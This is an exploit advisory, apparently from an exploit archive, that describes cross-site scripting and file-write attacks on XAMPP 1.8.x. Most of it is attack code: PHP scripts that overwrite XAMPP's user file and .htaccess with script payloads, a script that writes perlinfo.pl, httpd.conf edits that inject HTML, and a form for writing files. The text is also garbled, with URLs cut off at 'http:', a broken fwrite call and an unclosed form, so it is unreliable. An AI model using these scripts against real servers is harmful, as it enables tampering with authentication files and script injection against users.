#Exploit Name : XAMPP 1.8.x Multiple Vulnerabilities
#Author : DevilScreaM
# Date : 6 October 2014
#Vendor : http:
#Version : 1.8.x or Higher Version
#Operating System : Windows / Linux
#Vulnerability : Cross Site Scripting / Write File
#Type : #WebApps #Application
#Tested : Windows 7 64 Bit
#Thanks : Newbie-Security, Indonesian Hacker Team, Indonesia Coder Team, Indonesia Security Team
Cross Site Scripting at perlinfo.pl #1
Perl Version : 5.16.3
Script For Exploit
For Localhost
<?php
$xss = "<script>alert('Tested by DevilScreaM')</script>:" ;
$f =@ fopen ( 'C:\xampp\security\xampp.users' , 'w' );
fwrite( $f , $xss );
$htcs = 'AuthName "Username = your Script XSS"
AuthType Basic
AuthUserFile "C:\xampp\security\xampp.users"
require valid-user';
$f1 =@ fopen ( 'C:\xampp\htdocs\xampp\.htaccess' , 'w' );
fwrite( $f1 , $htcs );
?>
<script>
</script>
==================================================================
For Site
<?php
$xss = "<script>alert('Tested by DevilScreaM')</script>:" ;
$f =@ fopen ( 'my.users' , 'w' );
fwrite( $f , $xss );
$htcs = 'AuthName "Username = your Script XSS"
AuthType Basic
AuthUserFile "my.users"
require valid-user';
$f1 =@ fopen ( '.htaccess' , 'w' );
fwrite( $f1 , $htcs );
$pl = '#! "perl\bin\perl.exe"
use HTML::Perlinfo;
use CGI qw(header);
$q = new CGI;
print $q ->header;
$p = new HTML::Perlinfo;
$p ->info_general;
$p ->info_variables;
$p ->info_modules;
$p ->info_license;';
$f2 =@ fopen ( 'perlinfo.pl' , 'w' );
fwrite(f2 , $pl );
?>
<script>
</script>
==================================================================
Save Script C:\xampp\htdocs\xss.php
Open Browser and Running http:
You Will Redirect to http:
Auth Login
Username : <script>alert( 'Tested by DevilScreaM' )</script>
Password :
===================================================================
Cross Site Scripting at perlinfo.pl Query String #2
Exploit :
http:
http:
Example
http:
====================================================================
Cross Site Scripting at http:
Exploit :
1. Go To Directory C:\xampp\apache\conf\
2. Edit File httpd.conf
3. Go To Line 209
Edit ServerAdmin postmaster@localhost to
ServerAdmin [YOUR XSS]
Example :
ServerAdmin <h1>DevilScreaM</h1>
4. Save File
5. See your XSS at
http:
====================================================================
Cross Site Scripting at http:
Script for Exploit :
<?php
$xss = "<script>alert('Tested by DevilScreaM')</script>:" ;
$f =@ fopen ( 'C:\xampp\security\xampp.users' , 'w' );
fwrite( $f , $xss );
?>
<script>
</script>
Information :
usage_[YEARS][MONTH].html => usage_201410.html
====================================================================
Save Script Webalizer.php
Command
@ echo off
C:\xampp\webalizer\webalizer.exe -c C:\xampp\webalizer\webalizer.conf
PHP
<?php
$webalizer = "C:\xampp\webalizer\webalizer.bat" ;
system( $webalizer );
?>
=====================================================================
Save Script webalizer.cmd or webalizer_run.php
Run Webalizer.cmd and Waiting Process
Result
http:
Example
http:
==================================================================
Cross Site Scripting at cds.php
Exploit :
http:
Example :
http:
====================================================================
Write File Vulnerability
Script to Exploit :
<table border= '0' cellpadding= '0' cellspacing= '0' >
<tr><td>TEXT:</td>
<td><input type= 'text' size= '30' value= 'Tested by DevilScreaM' name= 'f_name' ></td></tr>
<tr><td></td><td><input type= 'submit' value= 'WRITE' ></td></tr>
</table></form>
</br></br>
==================================================================
Save Script with extension .html
Open Script and Click Write or Change Text
Result
http:
|